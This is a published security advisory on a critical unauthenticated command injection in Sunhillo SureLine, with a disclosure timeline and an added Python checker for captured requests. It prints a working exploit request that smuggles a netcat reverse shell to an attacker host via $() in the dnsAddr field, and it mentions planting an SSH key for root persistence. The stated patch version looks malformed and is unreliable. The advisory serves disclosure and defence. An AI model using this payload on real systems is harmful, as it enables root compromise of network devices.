Vendor: Sunhillo
Vendor URL: https://www.sunhillo.com/
Versions affected: SureLine <= 8.7.0
Systems Affected: Any using SureLine
Author: Liam Glanfield <firstname.lastname@example.org>
Advisory URL / CVE Identifier: CVE-2021-36380
Risk: Critical - complete compromise of the host
Sunhillo is an industry leader in surveillance data distribution. The Sunhillo SureLine application contained an unauthenticated operating system (OS) command injection vulnerability that allowed an attacker to execute arbitrary commands with root privileges. This would have allowed a threat actor to establish an interactive channel, effectively taking control of the target system.
Complete system compromise. With the threat actor in full control of the device they could cause a denial of service or utilise the device for persistence on the network.
The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
The script did appear to validate user input and blocked most techniques for OS command injection. However, command injection was still possible using $(), which allowed arbitrary commands to be run within the parentheses. The request also did not require any authentication (session cookie etc.).
The following parameters were affected:
The following lines demonstrate the creation of a reverse connection to an attacker’s host, leading to the establishment of a covert channel, effectively allowing an attacker to execute commands on the server. The installed ‘nc’ package (Netcat) is used to create a reverse connection to an attacker’s host (192.168.1.2) on port TCP/8181 while redirecting all traffic (stdout and stderr) to and from the /bin/bash shell.
POST /cgi/networkDiag.cgi HTTP/1.1
Host: 192.168.1.1
Content-Length: 145

command=2&ipAddr=&dnsAddr=$(nc+e+/bin/bash+192.168.1.2+8181)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=
The request above would send the shell to an attacker's host, which in this case would be listening on port 8181. This was compounded further by the web service running as root: with an interactive shell established, the system would be under the full control of the attacker. For example, the attacker could add an SSH public key to /home/root/.ssh/authorized_keys and gain access as the root user.
Update Sunhillo SureLine to version 188.8.131.52.1.
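For reviewing captured POST bodies sent to /cgi/networkDiag.cgi, the following is an added example and not part of the original advisory or of Sunhillo's code. It applies an allowlist (IP literal or hostname) to the address fields instead of a blocklist, and flags $() or backticks elsewhere; treating ipAddr and dnsAddr as the address fields is an assumption based on the request shown above, and the sample bodies are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qsl

# Assumption: these two fields carry a host address (names from the request above).
ADDRESS_FIELDS = {"ipAddr", "dnsAddr"}
# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*")
# Shell command substitution: $( ... ) or backticks.
SUBSTITUTION = re.compile(r"\$\(|`")


def is_address(value):
    """Accept an empty field, an IPv4/IPv6 literal, or a hostname; nothing else."""
    if value == "":
        return True
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return len(value) <= 253 and HOSTNAME.fullmatch(value) is not None


def suspicious_params(body):
    """Return (name, decoded value, reason) for each field that fails the checks."""
    findings = []
    # parse_qsl URL-decodes, so %24%28 is seen as "$(" just like the literal form.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in ADDRESS_FIELDS:
            if not is_address(value):
                findings.append((name, value, "not an IP address or hostname"))
        elif SUBSTITUTION.search(value):
            findings.append((name, value, "command substitution"))
    return findings


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "command=2&ipAddr=&dnsAddr=192.168.1.53&interface=0&netType=0",
    "command=2&ipAddr=&dnsAddr=$(id)&interface=0&netType=0",
    "command=2&ipAddr=&dnsAddr=%24%28id%29&interface=0&netType=0",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", suspicious_params(body) or "clean")
```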
NCC Group Notifies Vendor: 21st June 2021
Vendor Replies Requesting More Details: 21st June 2021
NCC Group Sends Requested information: 21st June 2021
Vendor Confirms The Vulnerability: 28th June 2021
NCC Group Requests a Patch Date: 28th June 2021
Vendor Response With Date: 7th July 2021
Patch Published: 22nd July 2021
Advisory Published: 26th July 2021
Liam Glanfield at NCC Group
Publish Date: 7/26/2021
Written by: Liam Glanfield